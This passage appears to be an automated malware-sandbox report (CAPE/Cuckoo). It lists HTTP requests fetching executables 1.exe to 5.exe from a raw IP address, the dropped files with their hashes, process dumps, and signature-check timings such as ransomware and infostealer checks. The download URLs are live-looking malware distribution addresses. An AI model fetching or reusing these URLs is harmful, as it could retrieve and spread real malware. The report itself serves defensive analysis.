User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://92.63.197.48/m/1.exe
GET /m/1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/2.exe
GET /m/2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/3.exe
GET /m/3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/4.exe
GET /m/4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/5.exe
GET /m/5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name winsvcs.exe
Associated Filenames
C:\Windows\5769805074060605\winsvcs.exe
File Size 144384 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 77067974a70af43a3cadf88219d1e28c
SHA1 7aa8fd4d0e0f44a4ed37f8542f7a1b0bc9faa58c
SHA256 4c0103c745fa6e173821035c304863d751bea9c073d19070d9ebf8685da95040
CRC32 9BD949DF
Ssdeep 1536:EJuqJbIXcA+Uli+SR1rJ0Fgc/7rSmOnVO1en5n/bFzhvYCvCY1AbIwLVbV56:yLJbIXjPkSgnzDHFCjbI8V
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name 3635423912.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\3635423912.exe
C:\Users\user\AppData\Local\Temp\4089713972.exe
File Size 539648 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 cb9d7ff8deb972b96917e88e0d56adac
SHA1 8ca2b46c42c7b413e9a24bdf2790f9260af0facf
SHA256 c2cb48209e590289e62a2e461ef9b00078b104aa359bdc02b64c695c9eb8cd27
CRC32 2161DC8B
Ssdeep 3072:G7UpE9lqoZ/WLpwsUPg7YSU2RrygKjFvwwwwwwlwwwwww2wwww4ByXrMlseFaEkX:G7V93ZeLpw1eU2RrygKFErMeeF3k
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name 3843231898.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\3843231898.exe
C:\Users\user\AppData\Local\Temp\3527325130.exe
File Size 598528 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e0e5164cf5b19d56f33520cd44875c95
SHA1 220f5a668dde7c6d916b1b9a5dcde82dbc2639f8
SHA256 035ae8f389e0a4cb58428d892123bc3e3b646e4387c641e664c5552228087285
CRC32 F995F0E6
Ssdeep 3072:Do/wytwRh/tBqZZ4qGT0sZLTHR4X+ZGDNKmM50m62LHOrHQjnM5zvyPuD3bMUdWi:DXkwftW4q8LT68mM57BRgT3yH
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name 2658928598.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\2658928598.exe
File Size 1209856 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 a14a3a3036a1706408443e28399a15c1
SHA1 6e5cf7cbfddca89f0f8e54b7ba8f169cf6769237
SHA256 b8bf5b607b305139db81c48e96010a67768488b01edc8c615306ed303c545b0d
CRC32 E4E5533F
Ssdeep 24576:35mjsJNJuudqiKKES942zSl3DU0pqsDnRctBfdoJJlp/5LFYgNYpp6A3:35SstuCeS942G9DU0tRkfeJ/FqWYt3
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
Sorry! No CAPE files.
Process Name Izu2hJvy.exe
PID 1900
Dump Size 15360 bytes
Module Path C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe
Type PE image: 32-bit executable
MD5 3615bfbcd8f12601076c027baa396376
SHA1 f14a6ac28230078ef0a8c3b94418cac2618f2fa3
SHA256 124593204fa7ee18b23c33a16f2e7f6e1a0001b14abecf9877b63e266296156f
CRC32 ED4FF55F
Ssdeep 192:zyGxgNKpyvjxdvl91Hx40ccE3aadWhcVUP1oynaUTG8tu3gKlaSM:z6ZUdKadWhcV610UTG8k3k
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 124593204fa7ee18b23c33a16f2e7f6e1a0001b14abecf9877b63e266296156f
Download
Process Name winsvcs.exe
PID 3040
Dump Size 15360 bytes
Module Path C:\Windows\5769805074060605\winsvcs.exe
Type PE image: 32-bit executable
MD5 5bc43bf46ff36af5ef0771f9ba09827b
SHA1 111c850f5ab4cc549b94192d62ecac3aa9012c83
SHA256 2985795868cd0d390ffb3f7bab59415d83b78c504635ddea97db5a55474e173e
CRC32 15905483
Ssdeep 192:zyGxgNKpyvjxdvl91Hx40ccE3aadWhcVUP1oynaUTG8tu3NKlaSM:z6ZUdKadWhcV610UTG8k3F
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 2985795868cd0d390ffb3f7bab59415d83b78c504635ddea97db5a55474e173e
Download

Comments



No comments posted

Processing ( 121.682 seconds )

  • 116.258 BehaviorAnalysis
  • 1.923 CAPE
  • 1.538 Dropped
  • 0.939 NetworkAnalysis
  • 0.62 Static
  • 0.164 TargetInfo
  • 0.097 ProcDump
  • 0.094 TrID
  • 0.032 Deduplicate
  • 0.01 Strings
  • 0.005 AnalysisInfo
  • 0.001 Debug
  • 0.001 config_decoder

Signatures ( 20.809 seconds )

  • 7.477 api_spamming
  • 5.601 decoy_document
  • 3.347 shifu_behavior
  • 2.742 stealth_timeout
  • 0.42 antivm_generic_disk
  • 0.29 bootkit
  • 0.172 mimics_filetime
  • 0.142 virus
  • 0.135 stealth_file
  • 0.132 reads_self
  • 0.122 hancitor_behavior
  • 0.054 webmail_phish
  • 0.032 secure_login_phish
  • 0.028 generic_phish
  • 0.018 network_document_http
  • 0.015 stealth_network
  • 0.014 wscript_downloader_http
  • 0.01 antiav_detectreg
  • 0.004 persistence_autorun
  • 0.004 antiav_detectfile
  • 0.004 infostealer_ftp
  • 0.004 ransomware_files
  • 0.003 securityxploded_modules
  • 0.003 infostealer_im
  • 0.003 ransomware_extensions
  • 0.002 Doppelganging
  • 0.002 sets_autoconfig_url
  • 0.002 ransomware_message
  • 0.002 antianalysis_detectreg
  • 0.002 modify_proxy
  • 0.002 browser_security
  • 0.002 disables_browser_warn
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_mail
  • 0.001 tinba_behavior
  • 0.001 malicious_dynamic_function_loading
  • 0.001 disables_spdy
  • 0.001 rat_nanocore
  • 0.001 antiemu_wine_func
  • 0.001 ipc_namedpipe
  • 0.001 dynamic_function_loading
  • 0.001 disables_wfp
  • 0.001 cerber_behavior
  • 0.001 kovter_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 network_torgateway

Reporting ( 0.014 seconds )

  • 0.012 SubmitCAPE
  • 0.002 CompressResults
Task ID 29485
Mongo ID 5c36bddcf28488708c4559d8
Cuckoo release 1.3-CAPE
Delete